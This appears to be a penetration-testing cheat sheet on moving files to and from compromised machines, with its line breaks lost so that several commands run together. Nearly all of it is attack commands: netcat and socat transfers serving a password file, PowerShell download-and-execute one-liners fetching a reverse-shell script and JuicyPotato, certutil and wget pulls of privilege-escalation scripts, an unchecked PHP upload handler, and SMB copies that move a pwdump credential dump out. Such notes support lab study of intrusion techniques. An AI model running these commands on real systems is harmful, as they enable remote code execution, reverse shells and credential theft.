nc -nlvp 4444 > incoming.exenc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exesudo socat TCP4-LISTEN:443,fork file:secret_passwords.txtnc <remote server's ip address> 80 kali@kali:~$ socat - TCP4:<remote server's ip address>:80sudo nc -lvp localhost 443 kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUTLast updated
Set-ExecutionPolicy Unrestrictedpowershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')invoke-webrequest -uri http://10.10.14.5/JuicyPotato.exe -outfile jp.exe certutil -urlcache -f http://10.10.16.2:8899/winpeas.bat winpeas.batwget http://10.50.121.50:8000/LinPEAS.sh -o lp.shscp ariah@192.168.130.99:C:/ftp/Infrastructure.pdf . systemctl start ssh.socket <?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')smbserver.py <SHARENAME> . --smb2supportcopy \\192.168.119.153\\sharez\\nc.exe "C:\\Documents and Settings\\no\\nc.exe"copy "C:\Documents and Settings\no\127.0.0.1.pwdump" \\192.168.119.153\\sharez\\127.0.0.1.pwdump